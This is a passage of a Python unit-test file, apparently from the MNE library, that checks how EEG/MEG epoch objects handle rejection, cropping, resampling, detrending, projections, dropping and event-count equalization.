reject_tmin=1., reject_tmax=0)
assert_raises(ValueError, Epochs, raw, events1, event_id, tmin, tmax,
reject_tmin=tmin - 1, reject_tmax=1.)
assert_raises(ValueError, Epochs, raw, events1, event_id, tmin, tmax,
reject_tmin=0., reject_tmax=tmax + 1)
epochs = Epochs(raw, events1, event_id, tmin, tmax, picks=picks,
reject=reject, flat=flat, reject_tmin=0., reject_tmax=.1)
data = epochs.get_data()
n_clean_epochs = len(data)
assert_true(n_clean_epochs == 7)
assert_true(len(epochs) == 7)
assert_true(epochs.times[epochs._reject_time][0] >= 0.)
assert_true(epochs.times[epochs._reject_time][-1] <= 0.1)
# Invalid data for _is_good_epoch function
epochs = Epochs(raw, events1, event_id, tmin, tmax)
assert_equal(epochs._is_good_epoch(None), (False, ['NO_DATA']))
assert_equal(epochs._is_good_epoch(np.zeros((1, 1))),
(False, ['TOO_SHORT']))
data = epochs[0].get_data()[0]
assert_equal(epochs._is_good_epoch(data), (True, None))
def test_preload_epochs():
"""Test preload of epochs."""
raw, events, picks = _get_data()
epochs_preload = Epochs(raw, events[:16], event_id, tmin, tmax,
picks=picks, preload=True,
reject=reject, flat=flat)
data_preload = epochs_preload.get_data()
epochs = Epochs(raw, events[:16], event_id, tmin, tmax, picks=picks,
preload=False, reject=reject, flat=flat)
data = epochs.get_data()
assert_array_equal(data_preload, data)
assert_array_almost_equal(epochs_preload.average().data,
epochs.average().data, 18)
def test_indexing_slicing():
"""Test of indexing and slicing operations."""
raw, events, picks = _get_data()
epochs = Epochs(raw, events[:20], event_id, tmin, tmax, picks=picks,
reject=reject, flat=flat)
data_normal = epochs.get_data()
n_good_events = data_normal.shape[0]
# indices for slicing
start_index = 1
end_index = n_good_events - 1
assert((end_index - start_index) > 0)
for preload in [True, False]:
epochs2 = Epochs(raw, events[:20], event_id, tmin, tmax, picks=picks,
preload=preload, reject=reject, flat=flat)
if not preload:
epochs2.drop_bad()
# using slicing
epochs2_sliced = epochs2[start_index:end_index]
data_epochs2_sliced = epochs2_sliced.get_data()
assert_array_equal(data_epochs2_sliced,
data_normal[start_index:end_index])
# using indexing
pos = 0
for idx in range(start_index, end_index):
data = epochs2_sliced[pos].get_data()
assert_array_equal(data[0], data_normal[idx])
pos += 1
# using indexing with an int
data = epochs2[data_epochs2_sliced.shape[0]].get_data()
assert_array_equal(data, data_normal[[idx]])
# using indexing with an array
idx = rng.randint(0, data_epochs2_sliced.shape[0], 10)
data = epochs2[idx].get_data()
assert_array_equal(data, data_normal[idx])
# using indexing with a list of indices
idx = [0]
data = epochs2[idx].get_data()
assert_array_equal(data, data_normal[idx])
idx = [0, 1]
data = epochs2[idx].get_data()
assert_array_equal(data, data_normal[idx])
def test_comparison_with_c():
"""Test of average obtained vs C code."""
raw, events = _get_data()[:2]
c_evoked = read_evokeds(evoked_nf_name, condition=0)
epochs = Epochs(raw, events, event_id, tmin, tmax, baseline=None,
preload=True, proj=False)
evoked = epochs.set_eeg_reference().apply_proj().average()
sel = pick_channels(c_evoked.ch_names, evoked.ch_names)
evoked_data = evoked.data
c_evoked_data = c_evoked.data[sel]
assert_true(evoked.nave == c_evoked.nave)
assert_array_almost_equal(evoked_data, c_evoked_data, 10)
assert_array_almost_equal(evoked.times, c_evoked.times, 12)
def test_crop():
"""Test of crop of epochs."""
raw, events, picks = _get_data()
epochs = Epochs(raw, events[:5], event_id, tmin, tmax, picks=picks,
preload=False, reject=reject, flat=flat)
assert_raises(RuntimeError, epochs.crop, None, 0.2) # not preloaded
data_normal = epochs.get_data()
epochs2 = Epochs(raw, events[:5], event_id, tmin, tmax,
picks=picks, preload=True, reject=reject, flat=flat)
with warnings.catch_warnings(record=True) as w:
epochs2.crop(-20, 200)
assert_true(len(w) == 2)
# indices for slicing
tmin_window = tmin + 0.1
tmax_window = tmax - 0.1
tmask = (epochs.times >= tmin_window) & (epochs.times <= tmax_window)
assert_true(tmin_window > tmin)
assert_true(tmax_window < tmax)
epochs3 = epochs2.copy().crop(tmin_window, tmax_window)
data3 = epochs3.get_data()
epochs2.crop(tmin_window, tmax_window)
data2 = epochs2.get_data()
assert_array_equal(data2, data_normal[:, :, tmask])
assert_array_equal(data3, data_normal[:, :, tmask])
assert_array_equal(epochs.time_as_index([tmin, tmax], use_rounding=True),
[0, len(epochs.times) - 1])
assert_array_equal(epochs3.time_as_index([tmin_window, tmax_window],
use_rounding=True),
[0, len(epochs3.times) - 1])
# test time info is correct
epochs = EpochsArray(np.zeros((1, 1, 1000)), create_info(1, 1000., 'eeg'),
np.ones((1, 3), int), tmin=-0.2)
epochs.crop(-.200, .700)
last_time = epochs.times[-1]
with warnings.catch_warnings(record=True): # not LP filtered
epochs.decimate(10)
assert_allclose(last_time, epochs.times[-1])
epochs = Epochs(raw, events[:5], event_id, -1, 1,
picks=picks, preload=True, reject=reject, flat=flat)
    # We include the nearest sample, so actually a bit beyond our bounds here
assert_allclose(epochs.tmin, -1.0006410259015925, rtol=1e-12)
assert_allclose(epochs.tmax, 1.0006410259015925, rtol=1e-12)
epochs_crop = epochs.copy().crop(-1, 1)
assert_allclose(epochs.times, epochs_crop.times, rtol=1e-12)
# Ensure we don't allow silly crops
with warnings.catch_warnings(record=True): # tmin/tmax out of bounds
assert_raises(ValueError, epochs.crop, 1000, 2000)
assert_raises(ValueError, epochs.crop, 0.1, 0)
def test_resample():
"""Test of resample of epochs."""
raw, events, picks = _get_data()
epochs = Epochs(raw, events[:10], event_id, tmin, tmax, picks=picks,
preload=False, reject=reject, flat=flat)
assert_raises(RuntimeError, epochs.resample, 100)
epochs_o = Epochs(raw, events[:10], event_id, tmin, tmax, picks=picks,
preload=True, reject=reject, flat=flat)
epochs = epochs_o.copy()
data_normal = cp.deepcopy(epochs.get_data())
times_normal = cp.deepcopy(epochs.times)
sfreq_normal = epochs.info['sfreq']
# upsample by 2
epochs = epochs_o.copy()
epochs.resample(sfreq_normal * 2, npad=0)
data_up = cp.deepcopy(epochs.get_data())
times_up = cp.deepcopy(epochs.times)
sfreq_up = epochs.info['sfreq']
    # downsample by 2, which should match
epochs.resample(sfreq_normal, npad=0)
data_new = cp.deepcopy(epochs.get_data())
times_new = cp.deepcopy(epochs.times)
sfreq_new = epochs.info['sfreq']
assert_true(data_up.shape[2] == 2 * data_normal.shape[2])
assert_true(sfreq_up == 2 * sfreq_normal)
assert_true(sfreq_new == sfreq_normal)
assert_true(len(times_up) == 2 * len(times_normal))
assert_array_almost_equal(times_new, times_normal, 10)
assert_true(data_up.shape[2] == 2 * data_normal.shape[2])
assert_array_almost_equal(data_new, data_normal, 5)
# use parallel
epochs = epochs_o.copy()
epochs.resample(sfreq_normal * 2, n_jobs=2, npad=0)
assert_true(np.allclose(data_up, epochs._data, rtol=1e-8, atol=1e-16))
# test copy flag
epochs = epochs_o.copy()
epochs_resampled = epochs.copy().resample(sfreq_normal * 2, npad=0)
assert_true(epochs_resampled is not epochs)
epochs_resampled = epochs.resample(sfreq_normal * 2, npad=0)
assert_true(epochs_resampled is epochs)
# test proper setting of times (#2645)
n_trial, n_chan, n_time, sfreq = 1, 1, 10, 1000.
data = np.zeros((n_trial, n_chan, n_time))
events = np.zeros((n_trial, 3), int)
info = create_info(n_chan, sfreq, 'eeg')
epochs1 = EpochsArray(data, deepcopy(info), events)
epochs2 = EpochsArray(data, deepcopy(info), events)
epochs = concatenate_epochs([epochs1, epochs2])
epochs1.resample(epochs1.info['sfreq'] // 2, npad='auto')
epochs2.resample(epochs2.info['sfreq'] // 2, npad='auto')
epochs = concatenate_epochs([epochs1, epochs2])
for e in epochs1, epochs2, epochs:
assert_equal(e.times[0], epochs.tmin)
assert_equal(e.times[-1], epochs.tmax)
# test that cropping after resampling works (#3296)
this_tmin = -0.002
epochs = EpochsArray(data, deepcopy(info), events, tmin=this_tmin)
for times in (epochs.times, epochs._raw_times):
assert_allclose(times, np.arange(n_time) / sfreq + this_tmin)
epochs.resample(info['sfreq'] * 2.)
for times in (epochs.times, epochs._raw_times):
assert_allclose(times, np.arange(2 * n_time) / (sfreq * 2) + this_tmin)
epochs.crop(0, None)
for times in (epochs.times, epochs._raw_times):
assert_allclose(times, np.arange((n_time - 2) * 2) / (sfreq * 2))
epochs.resample(sfreq)
for times in (epochs.times, epochs._raw_times):
assert_allclose(times, np.arange(n_time - 2) / sfreq)
def test_detrend():
"""Test detrending of epochs."""
raw, events, picks = _get_data()
# test first-order
epochs_1 = Epochs(raw, events[:4], event_id, tmin, tmax, picks=picks,
baseline=None, detrend=1)
epochs_2 = Epochs(raw, events[:4], event_id, tmin, tmax, picks=picks,
baseline=None, detrend=None)
data_picks = pick_types(epochs_1.info, meg=True, eeg=True,
exclude='bads')
evoked_1 = epochs_1.average()
evoked_2 = epochs_2.average()
evoked_2.detrend(1)
# Due to roundoff these won't be exactly equal, but they should be close
assert_true(np.allclose(evoked_1.data, evoked_2.data,
rtol=1e-8, atol=1e-20))
# test zeroth-order case
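    # (detrend=0 removes the per-epoch mean, which for data channels matches
    # baseline correction over the full window, i.e. baseline=(None, None))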
for preload in [True, False]:
epochs_1 = Epochs(raw, events[:4], event_id, tmin, tmax, picks=picks,
baseline=(None, None), preload=preload)
epochs_2 = Epochs(raw, events[:4], event_id, tmin, tmax, picks=picks,
baseline=None, preload=preload, detrend=0)
a = epochs_1.get_data()
b = epochs_2.get_data()
# All data channels should be almost equal
assert_true(np.allclose(a[:, data_picks, :], b[:, data_picks, :],
rtol=1e-16, atol=1e-20))
# There are non-M/EEG channels that should not be equal:
assert_true(not np.allclose(a, b))
for value in ['foo', 2, False, True]:
assert_raises(ValueError, Epochs, raw, events[:4], event_id,
tmin, tmax, detrend=value)
def test_bootstrap():
"""Test of bootstrapping of epochs."""
raw, events, picks = _get_data()
epochs = Epochs(raw, events[:5], event_id, tmin, tmax, picks=picks,
preload=True, reject=reject, flat=flat)
epochs2 = bootstrap(epochs, random_state=0)
assert_true(len(epochs2.events) == len(epochs.events))
assert_true(epochs._data.shape == epochs2._data.shape)
def test_epochs_copy():
"""Test copy epochs."""
raw, events, picks = _get_data()
epochs = Epochs(raw, events[:5], event_id, tmin, tmax, picks=picks,
preload=True, reject=reject, flat=flat)
copied = epochs.copy()
assert_array_equal(epochs._data, copied._data)
epochs = Epochs(raw, events[:5], event_id, tmin, tmax, picks=picks,
preload=False, reject=reject, flat=flat)
copied = epochs.copy()
data = epochs.get_data()
copied_data = copied.get_data()
assert_array_equal(data, copied_data)
def test_iter_evoked():
"""Test the iterator for epochs -> evoked."""
raw, events, picks = _get_data()
epochs = Epochs(raw, events[:5], event_id, tmin, tmax, picks=picks)
for ii, ev in enumerate(epochs.iter_evoked()):
x = ev.data
y = epochs.get_data()[ii, :, :]
assert_array_equal(x, y)
def test_subtract_evoked():
"""Test subtraction of Evoked from Epochs."""
raw, events, picks = _get_data()
epochs = Epochs(raw, events[:10], event_id, tmin, tmax, picks=picks)
    # make sure subtraction fails if data channels are missing
assert_raises(ValueError, epochs.subtract_evoked,
epochs.average(picks[:5]))
    # do the subtraction using the default argument
epochs.subtract_evoked()
# apply SSP now
epochs.apply_proj()
# use preloading and SSP from the start
epochs2 = Epochs(raw, events[:10], event_id, tmin, tmax, picks=picks,
preload=True)
evoked = epochs2.average()
epochs2.subtract_evoked(evoked)
# this gives the same result
assert_allclose(epochs.get_data(), epochs2.get_data())
# if we compute the evoked response after subtracting it we get zero
zero_evoked = epochs.average()
data = zero_evoked.data
assert_allclose(data, np.zeros_like(data), atol=1e-15)
def test_epoch_eq():
"""Test epoch count equalization and condition combining."""
raw, events, picks = _get_data()
# equalizing epochs objects
epochs_1 = Epochs(raw, events, event_id, tmin, tmax, picks=picks)
epochs_2 = Epochs(raw, events, event_id_2, tmin, tmax, picks=picks)
epochs_1.drop_bad() # make sure drops are logged
assert_true(len([l for l in epochs_1.drop_log if not l]) ==
len(epochs_1.events))
drop_log1 = epochs_1.drop_log = [[] for _ in range(len(epochs_1.events))]
drop_log2 = [[] if l == ['EQUALIZED_COUNT'] else l for l in
epochs_1.drop_log]
assert_true(drop_log1 == drop_log2)
assert_true(len([l for l in epochs_1.drop_log if not l]) ==
len(epochs_1.events))
assert_true(epochs_1.events.shape[0] != epochs_2.events.shape[0])
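    # 'mintime' drops epochs so the remaining events are matched as closely as
    # possible in time, whereas 'truncate' (below) simply keeps the first ones.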
equalize_epoch_counts([epochs_1, epochs_2], method='mintime')
assert_true(epochs_1.events.shape[0] == epochs_2.events.shape[0])
epochs_3 = Epochs(raw, events, event_id, tmin, tmax, picks=picks)
epochs_4 = Epochs(raw, events, event_id_2, tmin, tmax, picks=picks)
equalize_epoch_counts([epochs_3, epochs_4], method='truncate')
assert_true(epochs_1.events.shape[0] == epochs_3.events.shape[0])
assert_true(epochs_3.events.shape[0] == epochs_4.events.shape[0])
# equalizing conditions
epochs = Epochs(raw, events, {'a': 1, 'b': 2, 'c': 3, 'd': 4},
tmin, tmax, picks=picks, reject=reject)
epochs.drop_bad() # make sure drops are logged
assert_true(len([l for l in epochs.drop_log if not l]) ==
len(epochs.events))
drop_log1 = deepcopy(epochs.drop_log)
old_shapes = [epochs[key].events.shape[0] for key in ['a', 'b', 'c', 'd']]
epochs.equalize_event_counts(['a', 'b'])
# undo the eq logging
drop_log2 = [[] if l == ['EQUALIZED_COUNT'] else l for l in
epochs.drop_log]
assert_true(drop_log1 == drop_log2)
assert_true(len([l for l in epochs.drop_log if not l]) ==
len(epochs.events))
new_shapes = [epochs[key].events.shape[0] for key in ['a', 'b', 'c', 'd']]
assert_true(new_shapes[0] == new_shapes[1])
assert_true(new_shapes[2] == new_shapes[2])
assert_true(new_shapes[3] == new_shapes[3])
# now with two conditions collapsed
old_shapes = new_shapes
epochs.equalize_event_counts([['a', 'b'], 'c'])
new_shapes = [epochs[key].events.shape[0] for key in ['a', 'b', 'c', 'd']]
assert_true(new_shapes[0] + new_shapes[1] == new_shapes[2])
assert_true(new_shapes[3] == old_shapes[3])
assert_raises(KeyError, epochs.equalize_event_counts, [1, 'a'])
# now let's combine conditions
old_shapes = new_shapes
epochs.equalize_event_counts([['a', 'b'], ['c', 'd']])
new_shapes = [epochs[key].events.shape[0] for key in ['a', 'b', 'c', 'd']]
assert_true(old_shapes[0] + old_shapes[1] == new_shapes[0] + new_shapes[1])
assert_true(new_shapes[0] + new_shapes[1] == new_shapes[2] + new_shapes[3])
assert_raises(ValueError, combine_event_ids, epochs, ['a', 'b'], {'ab': 1})
combine_event_ids(epochs, ['a', 'b'], {'ab': 12}, copy=False)
caught = 0
for key in ['a', 'b']:
try:
epochs[key]
except KeyError:
caught += 1
assert_equal(caught, 2)
assert_true(not np.any(epochs.events[:, 2] == 1))
assert_true(not np.any(epochs.events[:, 2] == 2))
epochs = combine_event_ids(epochs, ['c', 'd'], {'cd': 34})
assert_true(np.all(np.logical_or(epochs.events[:, 2] == 12,
epochs.events[:, 2] == 34)))
assert_true(epochs['ab'].events.shape[0] == old_shapes[0] + old_shapes[1])
assert_true(epochs['ab'].events.shape[0] == epochs['cd'].events.shape[0])
# equalizing with hierarchical tags
epochs = Epochs(raw, events, {'a/x': 1, 'b/x': 2, 'a/y': 3, 'b/y': 4},
tmin, tmax, picks=picks, reject=reject)
cond1, cond2 = ['a', ['b/x', 'b/y']], [['a/x', 'a/y'], 'b']
es = [epochs.copy().equalize_event_counts(c)[0]
for c in (cond1, cond2)]
assert_array_equal(es[0].events[:, 0], es[1].events[:, 0])
cond1, cond2 = ['a', ['b', 'b/y']], [['a/x', 'a/y'], 'x']
for c in (cond1, cond2): # error b/c tag and id mix/non-orthogonal tags
assert_raises(ValueError, epochs.equalize_event_counts, c)
assert_raises(KeyError, epochs.equalize_event_counts,
["a/no_match", "b"])
# test equalization with no events of one type
epochs.drop(np.arange(10))
assert_equal(len(epochs['a/x']), 0)
assert_true(len(epochs['a/y']) > 0)
epochs.equalize_event_counts(['a/x', 'a/y'])
assert_equal(len(epochs['a/x']), 0)
assert_equal(len(epochs['a/y']), 0)
def test_access_by_name():
"""Test accessing epochs by event name and on_missing for rare events."""
tempdir = _TempDir()
raw, events, picks = _get_data()
# Test various invalid inputs
assert_raises(ValueError, Epochs, raw, events, {1: 42, 2: 42}, tmin,
tmax, picks=picks)
assert_raises(ValueError, Epochs, raw, events, {'a': 'spam', 2: 'eggs'},
tmin, tmax, picks=picks)
assert_raises(ValueError, Epochs, raw, events, {'a': 'spam', 2: 'eggs'},
tmin, tmax, picks=picks)
assert_raises(ValueError, Epochs, raw, events, 'foo', tmin, tmax,
picks=picks)
assert_raises(ValueError, Epochs, raw, events, ['foo'], tmin, tmax,
picks=picks)
# Test accessing non-existent events (assumes 12345678 does not exist)
event_id_illegal = dict(aud_l=1, does_not_exist=12345678)
assert_raises(ValueError, Epochs, raw, events, event_id_illegal,
tmin, tmax)
# Test on_missing
assert_raises(ValueError, Epochs, raw, events, 1, tmin, tmax,
on_missing='foo')
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
Epochs(raw, events, event_id_illegal, tmin, tmax, on_missing='warning')
nw = len(w)
assert_true(1 <= nw <= 2)
Epochs(raw, events, event_id_illegal, tmin, tmax, on_missing='ignore')
assert_equal(len(w), nw)
# Test constructing epochs with a list of ints as events
epochs = Epochs(raw, events, [1, 2], tmin, tmax, picks=picks)
for k, v in epochs.event_id.items():
assert_equal(int(k), v)
epochs = Epochs(raw, events, {'a': 1, 'b': 2}, tmin, tmax, picks=picks)
assert_raises(KeyError, epochs.__getitem__, 'bar')
data = epochs['a'].get_data()
event_a = events[events[:, 2] == 1]
assert_true(len(data) == len(event_a))
epochs = Epochs(raw, events, {'a': 1, 'b': 2}, tmin, tmax, picks=picks,
preload=True)
assert_raises(KeyError, epochs.__getitem__, 'bar')
temp_fname = op.join(tempdir, 'test-epo.fif')
epochs.save(temp_fname)
epochs2 = read_epochs(temp_fname)
for ep in [epochs, epochs2]:
data = ep['a'].get_data()
event_a = events[events[:, 2] == 1]
assert_true(len(data) == len(event_a))
assert_array_equal(epochs2['a'].events, epochs['a'].events)
epochs3 = Epochs(raw, events, {'a': 1, 'b': 2, 'c': 3, 'd': 4},
tmin, tmax, picks=picks, preload=True)
assert_equal(list(sorted(epochs3[('a', 'b')].event_id.values())),
[1, 2])
epochs4 = epochs['a']
epochs5 = epochs3['a']
assert_array_equal(epochs4.events, epochs5.events)
# 20 is our tolerance because epochs are written out as floats
assert_array_almost_equal(epochs4.get_data(), epochs5.get_data(), 20)
epochs6 = epochs3[['a', 'b']]
assert_true(all(np.logical_or(epochs6.events[:, 2] == 1,
epochs6.events[:, 2] == 2)))
assert_array_equal(epochs.events, epochs6.events)
assert_array_almost_equal(epochs.get_data(), epochs6.get_data(), 20)
# Make sure we preserve names
assert_equal(epochs['a']._name, 'a')
assert_equal(epochs[['a', 'b']]['a']._name, 'a')
@requires_pandas
def test_to_data_frame():
"""Test epochs Pandas exporter."""
raw, events, picks = _get_data()
epochs = Epochs(raw, events, {'a': 1, 'b': 2}, tmin, tmax, picks=picks)
assert_raises(ValueError, epochs.to_data_frame, index=['foo', 'bar'])
assert_raises(ValueError, epochs.to_data_frame, index='qux')
assert_raises(ValueError, epochs.to_data_frame, np.arange(400))
df = epochs.to_data_frame(index=['condition', 'epoch', 'time'],
picks=list(range(epochs.info['nchan'])))
# Default index and picks
df2 = epochs.to_data_frame()
assert_equal(df.index.names, df2.index.names)
assert_array_equal(df.columns.values, epochs.ch_names)
data = np.hstack(epochs.get_data())
assert_true((df.columns == epochs.ch_names).all())
assert_array_equal(df.values[:, 0], data[0] * 1e13)
assert_array_equal(df.values[:, 2], data[2] * 1e15)
for ind in ['time', ['condition', 'time'], ['condition', 'time', 'epoch']]:
df = epochs.to_data_frame(index=ind)
        assert_true(df.index.names == (ind if isinstance(ind, list) else [ind]))
        # test that non-indexed data were present as categorical variables
assert_array_equal(sorted(df.reset_index().columns[:3]),
sorted(['time', 'condition', 'epoch']))
def test_epochs_proj_mixin():
"""Test SSP proj methods from ProjMixin class."""
raw, events, picks = _get_data()
for proj in [True, False]:
epochs = Epochs(raw, events[:4], event_id, tmin, tmax, picks=picks,
proj=proj)
assert_true(all(p['active'] == proj for p in epochs.info['projs']))
# test adding / deleting proj
if proj:
epochs.get_data()
assert_true(all(p['active'] == proj for p in epochs.info['projs']))
assert_raises(ValueError, epochs.add_proj, epochs.info['projs'][0],
{'remove_existing': True})
assert_raises(ValueError, epochs.add_proj, 'spam')
assert_raises(ValueError, epochs.del_proj, 0)
else:
projs = deepcopy(epochs.info['projs'])
n_proj = len(epochs.info['projs'])
epochs.del_proj(0)
assert_true(len(epochs.info['projs']) == n_proj - 1)
# Test that already existing projections are not added.
epochs.add_proj(projs, remove_existing=False)
assert_true(len(epochs.info['projs']) == n_proj)
epochs.add_proj(projs[:-1], remove_existing=True)
assert_true(len(epochs.info['projs']) == n_proj - 1)
# catch no-gos.
# wrong proj argument
assert_raises(ValueError, Epochs, raw, events[:4], event_id, tmin, tmax,
picks=picks, proj='crazy')
for preload in [True, False]:
epochs = Epochs(raw, events[:4], event_id, tmin, tmax, picks=picks,
proj='delayed', preload=preload,
reject=reject).set_eeg_reference()
epochs_proj = Epochs(
raw, events[:4], event_id, tmin, tmax, picks=picks,
proj=True, preload=preload,
reject=reject).set_eeg_reference().apply_proj()
epochs_noproj = Epochs(
raw, events[:4], event_id, tmin, tmax, picks=picks,
proj=False, preload=preload, reject=reject).set_eeg_reference()
assert_allclose(epochs.copy().apply_proj().get_data(),
epochs_proj.get_data(), rtol=1e-10, atol=1e-25)
assert_allclose(epochs.get_data(),
epochs_noproj.get_data(), rtol=1e-10, atol=1e-25)
# make sure data output is constant across repeated calls
# e.g. drop bads
assert_array_equal(epochs.get_data(), epochs.get_data())
assert_array_equal(epochs_proj.get_data(), epochs_proj.get_data())
assert_array_equal(epochs_noproj.get_data(), epochs_noproj.get_data())
# test epochs.next calls
data = epochs.get_data().copy()
data2 = np.array([e for e in epochs])
assert_array_equal(data, data2)
# cross application from processing stream 1 to 2
epochs.apply_proj()
assert_array_equal(epochs._projector, epochs_proj._projector)
assert_allclose(epochs._data, epochs_proj.get_data())
# test mixin against manual application
epochs = Epochs(raw, events[:4], event_id, tmin, tmax, picks=picks,
baseline=None, proj=False).set_eeg_reference()
data = epochs.get_data().copy()
epochs.apply_proj()
assert_allclose(np.dot(epochs._projector, data[0]), epochs._data[0])
def test_delayed_epochs():
"""Test delayed projection on Epochs."""
raw, events, picks = _get_data()
events = events[:10]
picks = np.concatenate([pick_types(raw.info, meg=True, eeg=True)[::22],
pick_types(raw.info, meg=False, eeg=False,
ecg=True, eog=True)])
picks = np.sort(picks)
raw.load_data().pick_channels([raw.ch_names[pick] for pick in picks])
raw.info.normalize_proj()
del picks
n_epochs = 2 # number we expect after rejection
raw.info['lowpass'] = 40. # fake the LP info so no warnings
for decim in (1, 3):
proj_data = Epochs(raw, events, event_id, tmin, tmax, proj=True,
reject=reject, decim=decim)
use_tmin = proj_data.tmin
proj_data = proj_data.get_data()
noproj_data = Epochs(raw, events, event_id, tmin, tmax, proj=False,
reject=reject, decim=decim).get_data()
assert_equal(proj_data.shape, noproj_data.shape)
assert_equal(proj_data.shape[0], n_epochs)
for preload in (True, False):
for proj in (True, False, 'delayed'):
for ii in range(3):
print(decim, preload, proj, ii)
comp = proj_data if proj is True else noproj_data
if ii in (0, 1):
epochs = Epochs(raw, events, event_id, tmin, tmax,
proj=proj, reject=reject,
preload=preload, decim=decim)
else:
fake_events = np.zeros((len(comp), 3), int)
fake_events[:, 0] = np.arange(len(comp))
fake_events[:, 2] = 1
epochs = EpochsArray(comp, raw.info, tmin=use_tmin,
event_id=1, events=fake_events,
proj=proj)
epochs.info['sfreq'] /= decim
assert_equal(len(epochs), n_epochs)
assert_true(raw.proj is False)
assert_true(epochs.proj is
(True if proj is True else False))
if ii == 1:
epochs.load_data()
picks_data = pick_types(epochs.info, meg=True, eeg=True)
evoked = epochs.average(picks=picks_data)
assert_equal(evoked.nave, n_epochs, epochs.drop_log)
if proj is True:
evoked.apply_proj()
else:
assert_true(evoked.proj is False)
assert_array_equal(evoked.ch_names,
np.array(epochs.ch_names)[picks_data])
assert_allclose(evoked.times, epochs.times)
epochs_data = epochs.get_data()
assert_allclose(evoked.data,
epochs_data.mean(axis=0)[picks_data],
rtol=1e-5, atol=1e-20)
assert_allclose(epochs_data, comp, rtol=1e-5, atol=1e-20)
def test_drop_epochs():
"""Test dropping of epochs."""
raw, events, picks = _get_data()
epochs = Epochs(raw, events, event_id, tmin, tmax, picks=picks)
events1 = events[events[:, 2] == event_id]
# Bound checks
assert_raises(IndexError, epochs.drop, [len(epochs.events)])
assert_raises(IndexError, epochs.drop, [-1])
assert_raises(ValueError, epochs.drop, [[1, 2], [3, 4]])
# Test selection attribute
assert_array_equal(epochs.selection,
np.where(events[:, 2] == event_id)[0])
assert_equal(len(epochs.drop_log), len(events))
assert_true(all(epochs.drop_log[k] == ['IGNORED']
for k in set(range(len(events))) - set(epochs.selection)))
selection = epochs.selection.copy()
n_events = len(epochs.events)
epochs.drop([2, 4], reason='d')
assert_equal(epochs.drop_log_stats(), 2. / n_events * 100)
assert_equal(len(epochs.drop_log), len(events))
assert_equal([epochs.drop_log[k]
for k in selection[[2, 4]]], [['d'], ['d']])
assert_array_equal(events[epochs.selection], events1[[0, 1, 3, 5, 6]])
assert_array_equal(events[epochs[3:].selection], events1[[5, 6]])
assert_array_equal(events[epochs['1'].selection], events1[[0, 1, 3, 5, 6]])
def test_drop_epochs_mult():
"""Test that subselecting epochs or making less epochs is equivalent."""
raw, events, picks = _get_data()
for preload in [True, False]:
epochs1 = Epochs(raw, events, {'a': 1, 'b': 2},
tmin, tmax, picks=picks, reject=reject,
preload=preload)['a']
epochs2 = Epochs(raw, events, {'a': 1},
tmin, tmax, picks=picks, reject=reject,
preload=preload)
if preload:
# In the preload case you cannot know the bads if already ignored
assert_equal(len(epochs1.drop_log), len(epochs2.drop_log))
for d1, d2 in zip(epochs1.drop_log, epochs2.drop_log):
if d1 == ['IGNORED']:
assert_true(d2 == ['IGNORED'])
if d1 != ['IGNORED'] and d1 != []:
assert_true((d2 == d1) or (d2 == ['IGNORED']))
if d1 == []:
assert_true(d2 == [])
assert_array_equal(epochs1.events, epochs2.events)
assert_array_equal(epochs1.selection, epochs2.selection)
else:
            # In the non-preload case it should be exactly the same
assert_equal(epochs1.drop_log, epochs2.drop_log)
assert_array_equal(epochs1.events, epochs2.events)
assert_array_equal(epochs1.selection, epochs2.selection)
def test_contains():
"""Test membership API."""
raw, events = _get_data(True)[:2]
# Add seeg channel
seeg = RawArray(np.zeros((1, len(raw.times))),
create_info(['SEEG 001'], raw.info['sfreq'], 'seeg'))
for key in ('dev_head_t', 'buffer_size_sec', 'highpass', 'lowpass',
'dig', 'description', 'acq_pars', 'experimenter',
'proj_name'):
seeg.info[key] = raw.info[key]
raw.add_channels([seeg])
tests = [(('mag', False, False), ('grad', 'eeg', 'seeg')),
(('grad', False, False), ('mag', 'eeg', 'seeg')),
((False, True, False), ('grad', 'mag', 'seeg')),
((False, False, True), ('grad', 'mag', 'eeg'))]
for (meg, eeg, seeg), others in tests:
picks_contains = pick_types(raw.info, meg=meg, eeg=eeg, seeg=seeg)
epochs = Epochs(raw, events, {'a': 1, 'b': 2}, tmin, tmax,
picks=picks_contains)
if eeg:
test = 'eeg'
elif seeg:
test = 'seeg'
else:
test = meg
assert_true(test in epochs)
assert_true(not any(o in epochs for o in others))
assert_raises(ValueError, epochs.__contains__, 'foo')
assert_raises(ValueError, epochs.__contains__, 1)
def test_drop_channels_mixin():
"""Test channels-dropping functionality."""
raw, events = _get_data()[:2]
# here without picks to get additional coverage
epochs = Epochs(raw, events, event_id, tmin, tmax, preload=True)
drop_ch = epochs.ch_names[:3]
ch_names = epochs.ch_names[3:]
ch_names_orig = epochs.ch_names
dummy = epochs.copy().drop_channels(drop_ch)
assert_equal(ch_names, dummy.ch_names)
assert_equal(ch_names_orig, epochs.ch_names)
assert_equal(len(ch_names_orig), epochs.get_data().shape[1])
epochs.drop_channels(drop_ch)
assert_equal(ch_names, epochs.ch_names)
assert_equal(len(ch_names), epochs.get_data().shape[1])
def test_pick_channels_mixin():
"""Test channel-picking functionality."""
raw, events, picks = _get_data()
epochs = Epochs(raw, events, event_id, tmin, tmax, picks=picks,
preload=True)
ch_names = epochs.ch_names[:3]
epochs.preload = False
assert_raises(RuntimeError, epochs.drop_channels, [ch_names[0]])
epochs.preload = True
ch_names_orig = epochs.ch_names
dummy = epochs.copy().pick_channels(ch_names)
assert_equal(ch_names, dummy.ch_names)
assert_equal(ch_names_orig, epochs.ch_names)
assert_equal(len(ch_names_orig), epochs.get_data().shape[1])
epochs.pick_channels(ch_names)
assert_equal(ch_names, epochs.ch_names)
assert_equal(len(ch_names), epochs.get_data().shape[1])
# Invalid picks
assert_raises(ValueError, Epochs, raw, events, event_id, tmin, tmax,
picks=[])
def test_equalize_channels():
"""Test equalization of channels."""
raw, events, picks = _get_data()
epochs1 = Epochs(raw, events, event_id, tmin, tmax, picks=picks,
proj=False, preload=True)
epochs2 = epochs1.copy()
ch_names = epochs1.ch_names[2:]
epochs1.drop_channels(epochs1.ch_names[:1])
epochs2.drop_channels(epochs2.ch_names[1:2])
my_comparison = [epochs1, epochs2]
equalize_channels(my_comparison)
for e in my_comparison:
assert_equal(ch_names, e.ch_names)
def test_illegal_event_id():
"""Test handling of invalid events ids."""
raw, events, picks = _get_data()
event_id_illegal = dict(aud_l=1, does_not_exist=12345678)
assert_raises(ValueError, Epochs, raw, events, event_id_illegal, tmin,
tmax, picks=picks, proj=False)
def test_add_channels_epochs():
"""Test adding channels"""
raw, events, picks = _get_data()
